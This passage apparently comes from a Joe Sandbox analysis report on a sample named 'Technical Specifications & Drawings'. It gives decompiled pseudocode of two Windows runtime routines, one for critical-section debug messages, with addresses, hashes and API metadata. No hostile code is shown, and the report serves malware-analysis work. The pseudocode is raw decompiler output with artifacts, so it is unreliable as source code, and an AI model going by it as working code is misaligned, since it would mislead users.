							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push(4);
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							E017C2280(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							E017BFFB0(_t72, _t82, _t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
							 *0x189b1e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return E017EB640(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}


































                                                  0x017d645b
                                                  0x017d6463
                                                  0x017d646d
                                                  0x017d6475
                                                  0x017d647a
                                                  0x017d647e
                                                  0x017d6480
                                                  0x017d648c
                                                  0x017d6490
                                                  0x017d6495
                                                  0x017d6498
                                                  0x017d649b
                                                  0x017d649f
                                                  0x017d64a1
                                                  0x01817c07
                                                  0x01817c09
                                                  0x01817c0c
                                                  0x00000000
                                                  0x017d64a7
                                                  0x017d64a7
                                                  0x017d64aa
                                                  0x01817bf7
                                                  0x01817c00
                                                  0x00000000
                                                  0x01817bf9
                                                  0x01817bf9
                                                  0x01817bf9
                                                  0x017d64b0
                                                  0x017d64b0
                                                  0x017d64b2
                                                  0x017d64b2
                                                  0x017d64b3
                                                  0x017d64ba
                                                  0x017d6553
                                                  0x017d655e
                                                  0x017d6566
                                                  0x017d656c
                                                  0x017d6575
                                                  0x017d657f
                                                  0x017d6585
                                                  0x017d6588
                                                  0x017d6588
                                                  0x017d64c7
                                                  0x017d64cb
                                                  0x017d64ce
                                                  0x017d64d3
                                                  0x017d64da
                                                  0x017d64e5
                                                  0x017d64ed
                                                  0x017d64f1
                                                  0x017d64f5
                                                  0x017d64f6
                                                  0x017d64fa
                                                  0x017d6502
                                                  0x017d6503
                                                  0x017d6504
                                                  0x017d6507
                                                  0x017d651a
                                                  0x017d6524
                                                  0x017d6524
                                                  0x017d6526
                                                  0x017d6526
                                                  0x017d64aa
                                                  0x017d652c
                                                  0x017d652d
                                                  0x017d652e
                                                  0x017d6539

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: 0$0
                                                  • API String ID: 3446177414-203156872
                                                  • Opcode ID: 43fcfecfba3a9591e0065bcd84e1f46a6f121184b956e1348a2ac2efa7bab55a
                                                  • Instruction ID: e3e275673b4b4ca65380b493e2f4e33cf33de9a0c594eb95b0a1a0e074c7d39a
                                                  • Opcode Fuzzy Hash: 43fcfecfba3a9591e0065bcd84e1f46a6f121184b956e1348a2ac2efa7bab55a
                                                  • Instruction Fuzzy Hash: 984158B26087069FC311CF28C484A1ABBE5BB8D714F044A6EF989DB301D731EA45CB86
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0183FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 53%
                                                  			E0183FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E017ECE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01835720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01835720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                  0x0183fdda
                                                  0x0183fde2
                                                  0x0183fde5
                                                  0x0183fdec
                                                  0x0183fdfa
                                                  0x0183fdff
                                                  0x0183fe0a
                                                  0x0183fe0f
                                                  0x0183fe17
                                                  0x0183fe1e
                                                  0x0183fe19
                                                  0x0183fe19
                                                  0x0183fe19
                                                  0x0183fe20
                                                  0x0183fe21
                                                  0x0183fe22
                                                  0x0183fe25
                                                  0x0183fe40

                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0183FDFA
                                                  Strings
                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0183FE01
                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0183FE2B
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                  • API String ID: 885266447-3903918235
                                                  • Opcode ID: 1639a97381e31f5cb0a36aa3fad93769609d3d91582d2dbf14104c442553076d
                                                  • Instruction ID: b6b9920870f858e195227ecc3a5a59b95b15711fe7171c4d39dcff66baf5396b
                                                  • Opcode Fuzzy Hash: 1639a97381e31f5cb0a36aa3fad93769609d3d91582d2dbf14104c442553076d
                                                  • Instruction Fuzzy Hash: 34F0FC725401017FEB211A49DC06F23BF9ADB84730F180314F724951E1D962F92086F1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%